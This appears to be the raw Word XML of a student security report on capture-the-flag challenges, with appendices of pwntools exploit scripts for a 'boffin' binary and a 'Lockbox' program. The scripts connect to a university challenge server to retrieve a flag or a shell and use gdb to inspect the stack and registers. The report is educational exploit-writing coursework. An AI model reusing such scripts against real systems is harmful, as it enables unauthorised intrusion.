                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Currently </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>segfaults</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="54D8DAF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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E554EBD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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49BA58B0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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwnGDB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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE94257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# Start gdb session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA2B462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p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BEEF6F5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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('gdb ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7984E972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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("break *0x0000000000400719")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFCAF73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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("break *0x000000000040071a")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE3C47D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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF5D70A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#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recv</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58475620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r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43BFEC02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#cf = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.corefile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="34CDCF29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#stack = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cf.rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="569127D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19B25C0B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6A81CBEA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A function to attack a local instance of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1078B983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</w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Currently </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>segfaults</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0271807B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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="575A9066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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48628F3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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwnLocal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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="081D32FC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# Start local instance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6339A6A4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p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35BACB27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r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A106E62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43678FED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77094745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 Host and port for the remote challenge</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A00098B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HOST = 'offsec-chalbroker.osiris.cyber.nyu.edu'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7AED7E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PORT = 1337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CF5C60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3BB9D5ED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A function to get the flag from a remote instance of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6350BC76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</w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Currently functional</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B5AF32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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2E00EB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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE61F9A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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwnRemote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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D56FD76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# Start remote session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D465947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p = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>remote(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDBE897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print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getFlag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25769CA2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</w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5263BA0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56E4B42C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A function to get a shell from a remote instance of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1EE0F213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</w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Currently functional</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36B38092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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F582753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</w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E95D2B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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shellRemote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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AA7EF11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# Start remote session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178B6513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 xml:space="preserve">p = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>remote(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B15428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ab/>
              <w:t>#getShell(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02F65C99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lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404B19CC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1C297424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</w:p>
          <w:p w14:paraId="7D594910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># Uncomment for function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6554EFA9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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwnRemote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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="067B022F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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shellRemote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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="380F8C1B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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwnLocal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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477EC924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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwnGDB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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F7420B" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRPr="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>segFuzz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="686BD914" w14:textId="1ABC114D" w:rsidR="008912FE" w:rsidRPr="00E23C61" w:rsidRDefault="008912FE" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52C23F57" w14:textId="4727DD6A" w:rsidR="0062558E" w:rsidRDefault="0062558E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084D3DB" w14:textId="7661A912" w:rsidR="0062558E" w:rsidRDefault="0062558E" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Appendix_D:_BoD_Remote.py"/>
      <w:bookmarkStart w:id="16" w:name="_Appendix_D:_Lockbox_Pwn.py"/>
      <w:bookmarkStart w:id="17" w:name="_Toc159948664"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D: </w:t>
      </w:r>
      <w:r w:rsidR="00200143">
        <w:t>Lockbox_Pwn.p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558E" w:rsidRPr="00E23C61" w14:paraId="4628BC57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268507D7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from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588A8CD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import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5649BD6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import </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="65F38263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import </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>math</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="76E6AA38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0A1D0BC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 A function to convert encoded input to a string and remove text format characters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="175A68DA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Input: Encoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02754193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Output: Unencoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="676157BA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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(ln):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6F64AC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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ansi_escape</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>re.compile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7875ECC1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l = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ansi_escape.sub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'', str(ln, encoding='utf-8'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F0892E2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return </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="66F7E228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4EAC149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 A function to print out part of the stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A9F9D1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Input: Connection, number of words to print</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185A0480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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506B5C1F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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>printStack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p, n):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B9DEE3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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "x/" + str(n) + "x $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A88B33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recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F0EA1C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>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("(gdb) ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4352120F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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8B93C7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0BB11A5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t = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>math.ceil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(n/4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="244BC49C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>#print(t)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C2621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for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>range(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0, t):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01393EBC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  <w:t xml:space="preserve">d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C285EE2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  <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(d))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03CCBA81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>print("return")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="601BA0E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recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF851F7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>return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="376D279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7194311A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# A function to print </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>print</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> the results of the "info registers" command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2CB891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Input: Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17B171EA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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D6BCC51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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getInfoRegs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B89FCA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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "info registers"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77AE08C6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recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A939507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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC92C8C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>while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BECC21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  <w:t xml:space="preserve">d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(timeout=0.05))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA9DC96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  <w:t>print(d)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B805517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  <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
